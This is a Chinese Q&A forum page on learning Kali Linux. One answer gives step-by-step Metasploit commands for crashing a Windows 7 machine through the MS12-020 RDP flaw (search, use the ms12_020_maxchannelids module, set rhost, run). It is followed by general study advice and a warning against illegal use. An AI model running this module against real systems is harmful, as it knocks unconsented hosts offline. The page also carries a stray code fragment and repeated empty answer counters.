{eval=Array;=+count(Array);}
分享一個小例子給你
利用msf對MS12-020漏洞進行滲透測試
工具:metasploit
靶機:windows 7 專業(yè)版 開啟允許遠程桌面連接(3389)
主要是復(fù)用已知的exploitcode(漏洞)代碼對系統(tǒng)進行利用(滲透測試)
第一次使用建議在桌面直接打開,不要在終端上打開,因為首次使用該工具會初始化數(shù)據(jù)。
選項
banner 顯示Logo
search 關(guān)鍵字 利用search搜索可利用的漏洞
search ms12-020 搜索ms12-020漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 應(yīng)用模塊
show options 顯示選項
set + 選項名
set rhost 被攻擊者ip 例如:set rhost 192.168.10.110
run 對ip的ms12-020漏洞進行攻擊
被攻擊者藍屏重啟
show auxiliary 顯示輔助模塊
很高興回答你的問題我是林創(chuàng)云小編,如果我的回答對你有幫助歡迎給我評論留言或者點贊加個關(guān)注!
kali資料,附圖如下
由于是安全教材,小編就不直接貼鏈接了。需要的sixin吧。
友情提示:網(wǎng)絡(luò)非法外之地,請不要亂做壞事。
要想系統(tǒng)的學(xué)習(xí) kali Linux,必須有一個系統(tǒng)的大綱,其次要有一個高效的學(xué)習(xí)方法。具體該怎么做呢?
首先得有一個明確的目標(你想系統(tǒng)學(xué)習(xí) kali Linux,那么到底要達到什么樣的學(xué)習(xí)效果?會滲透測試?還是會用 kali Linux 的 600 多個工具,還是對 kali Linux 這個系統(tǒng)有個全面的了解和認識?),只有目標明確了才能有一個明確的學(xué)習(xí)路線;
其次,有了明確的目標后,就要開始構(gòu)建自己的知識體系,要達到自己的目標,應(yīng)該有怎樣的知識體系(需要學(xué)習(xí)哪些內(nèi)容? Linux 基礎(chǔ)? 網(wǎng)絡(luò)基礎(chǔ)? TCP / IP x協(xié)議? web? C 語言等等)構(gòu)建好了自己的知識體系,學(xué)習(xí)路線自然也就出來了;
接著就是要有輸出了,每天學(xué)習(xí)了什么,自己有沒有總結(jié),有沒有講給別人聽等,如果這是死學(xué),那么和書呆子是沒有兩樣的。
還有就是要應(yīng)用自己學(xué)到的知識,當然不是拿去干違法犯罪的事,自己可以搭實驗環(huán)境驗證自己學(xué)習(xí)的知識是否掌握了。過一段時間就把前面學(xué)習(xí)的也應(yīng)用一下,時間久了,學(xué)習(xí)的東西多了,還可以結(jié)合所有學(xué)過的知識點做一些大一點的應(yīng)用。
最后就是學(xué)習(xí)狀態(tài)了,我知道很多人的學(xué)習(xí)都是三分鐘熱度,堅持下來的很少,所以只有保持自己最初的學(xué)習(xí)狀態(tài),學(xué)會自我激勵,在遇到困難的時候,想放棄學(xué)習(xí)的時候想想自己最初的目標實現(xiàn)了嗎?如果沒有,那就打起精神好好學(xué)吧?不忘初心,方得始終!
1.如果只是為了達到能夠日常使用的程度,就是多用多查,大多數(shù)人推薦看《鳥哥的私房菜》。2.如果只是為了達到能夠使用kali系統(tǒng)中的工具,可以查找一些參考書,比如《kali滲透測試技術(shù)實戰(zhàn)》等,表示我用過wifi破解的工具,沒有成功過。3.如果想往安全方面發(fā)展,個人認為就不能局限于系統(tǒng),而要查找安全相關(guān)資料,表示我沒接觸過,具體的東東也不懂。
附:同是初學(xué)者,如果有更好的學(xué)習(xí)方法,希望能多多分享~
0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答